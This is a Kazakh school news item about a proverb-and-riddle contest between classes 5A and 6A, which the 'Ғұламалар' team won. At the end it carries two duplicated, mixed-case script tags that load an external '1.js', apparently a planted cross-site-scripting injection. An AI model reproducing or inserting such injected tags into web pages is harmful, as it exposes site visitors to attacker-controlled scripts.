5-ақпан күні, сағат 16.00-де пән мұғалімі Ж.Сейтжанованың ұйымдастыруымен 5А сыныптың "Ғұламалар" және 6А сыныптың "Ғалымдар" топтары аралығында "МЫҢ БІР МАҚАЛ, ЖҮЗ БІР ЖҰМБАҚ" білімділер байқауы өтті. Байқау кейінгі тапсырмалардан құрылды: Таныстыру (топ атауы, ұраны). Үй жұмысы- суретті мақалдардың шешуін табу. Мақал-мәтелдердің жалғасын тап, мағынасын аш. Аса қызықты да қызу талқыға ұласқан МАҚАЛДАР АЙТЫСЫ тапсырмасы болды. Екі жақтың да шәкірттері тамаша дайындалған. Іс-шара оқушылардың көңілінен шықты. Бастысы балалар көп, жаңа мақал-мәтелдерге қанық болып, білім көкжиегін кеңейтті. Байқау нәтижесі бойынша "Ғұламалар" тобы жеңіске жетті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>